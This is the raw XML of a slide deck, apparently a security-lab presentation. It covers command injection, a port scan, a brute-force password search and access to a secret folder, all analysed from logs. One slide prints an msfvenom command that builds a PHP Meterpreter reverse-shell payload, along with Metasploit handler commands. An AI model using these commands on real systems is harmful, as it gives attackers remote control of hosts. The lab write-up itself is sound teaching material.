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Thin"/>
      <p:regular r:id="rId29"/>
      <p:bold r:id="rId30"/>
      <p:italic r:id="rId31"/>
      <p:boldItalic r:id="rId32"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Black"/>
      <p:bold r:id="rId33"/>
      <p:boldItalic r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
      <p:italic r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId39"/>
      <p:bold r:id="rId40"/>
      <p:italic r:id="rId41"/>
      <p:boldItalic r:id="rId42"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto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51E6B2-3F8B-4528-A542-1EF268BE0935}">
  <a:tblStyle styleId="{9B51E6B2-3F8B-4528-A542-1EF268BE093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Light-bold.fntdata"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-regular.fntdata"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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italic.fntdata"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-bold.fntdata"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-bold.fntdata"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-regular.fntdata"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoBlack-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Roboto-regular.fntdata"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto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Thin-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1.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3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8.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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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4.png"/><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3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3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37.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3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57.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image44.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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52.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image48.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image54.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5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62.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image61.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6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69.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image66.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image70.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image68.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image71.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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79.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image75.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image74.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image80.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image78.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7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83.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image87.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image85.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8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6.png"/><Relationship Id="rId3"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89.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image96.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8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100.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image88.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image82.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image99.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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1.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10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hyperlink" Target="https://tsapps.nist.gov/publication/get_pdf.cfm?pub_id=913287"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CWE-77: Command Injection</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;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4" name="Google Shape;1134;p6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3"/>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Tool Used:</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150">
                <a:solidFill>
                  <a:srgbClr val="1D1C1D"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>msfvenom</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36" name="Google Shape;1136;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457181" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1137" name="Google Shape;1137;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8" name="Google Shape;1138;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63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1140" name="Google Shape;1140;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1" name="Google Shape;1141;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2" name="Google Shape;1142;p63"/>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3"/>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With msfvenon we were able to create a malware using PHP and creating a reverse shell connection that allow us to remote connect and control the host.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1144" name="Google Shape;1144;p63"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1145" name="Google Shape;1145;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6" name="Google Shape;1146;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7" name="Google Shape;1147;p63"/>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3"/>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None/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Commands from msfvenon:</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>PHP Meterpreter Reverse TCP</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1000">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom -p php/meterpreter_reverse_tcp LHOST=&lt;Your IP Address&gt; LPORT=&lt;Your Port to Connect On&gt; -f raw &gt; shell.ph</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1000">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Metasploit Handler</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>use exploit/multi/handler</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>set PAYLOAD &lt;Payload name&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Set RHOST &lt;Remote IP&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>set LHOST &lt;Local IP&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>set LPORT &lt;Local Port&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="800">
              <a:latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="800">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Run</a:t>
            </a:r>
            <a:endParaRPr sz="12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pic>
        <p:nvPicPr>
          <p:cNvPr id="1153" name="Google Shape;1153;p64"/>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54" name="Google Shape;1154;p64"/>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5" name="Google Shape;1155;p6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61" name="Google Shape;1161;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2" name="Google Shape;1162;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="835125"/>
            <a:ext cx="8409300" cy="38805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latin typeface="Roboto"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Google Shape;1163;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3015225"/>
            <a:ext cx="8409300" cy="1700400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The port scan started around </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Oct 6, 23:20</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="60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600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>More than 1.200.00 packets were sent from IP 192.168.1.90</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The number of 404 and 401 responses to the attacker connections indicates a brute-force port scan attack</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1164" name="Google Shape;1164;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="835113"/>
            <a:ext cx="6020742" cy="1659563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1165" name="Google Shape;1165;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6388099" y="835113"/>
            <a:ext cx="2327286" cy="22937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1" name="Google Shape;1171;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2" name="Google Shape;1172;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="871025"/>
            <a:ext cx="8409300" cy="37995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73" name="Google Shape;1173;p66"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3174125"/>
            <a:ext cx="8409300" cy="14964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   Close to 17.00 requests it started around 00:00</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>The following files were requested</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /company_folders/secret_folder/connect_to_corp_server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t> the file contains the information to access the corp server</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="871025"/>
            <a:ext cx="3788100" cy="1778725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1175" name="Google Shape;1175;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4347175" y="871025"/>
            <a:ext cx="4429475" cy="1142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1" name="Google Shape;1181;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2" name="Google Shape;1182;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="848500"/>
            <a:ext cx="8409300" cy="38670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sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p67"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="3484000"/>
            <a:ext cx="8409300" cy="1231500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>To find the password for the secret folder about 17.000 requests were made</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>Exactly </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>16,891 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200"/>
              <a:t>request were made before the password was discovered</a:t>
            </a:r>
            <a:endParaRPr sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1184" name="Google Shape;1184;p67"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2764151" y="848497"/>
            <a:ext cx="2418987" cy="2384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0" name="Google Shape;1190;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1" name="Google Shape;1191;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300350" y="856000"/>
            <a:ext cx="8559900" cy="38370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92" name="Google Shape;1192;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="300350" y="3721300"/>
            <a:ext cx="8559900" cy="971700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="0" lIns="457200" spcFirstLastPara="1" rIns="457200" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
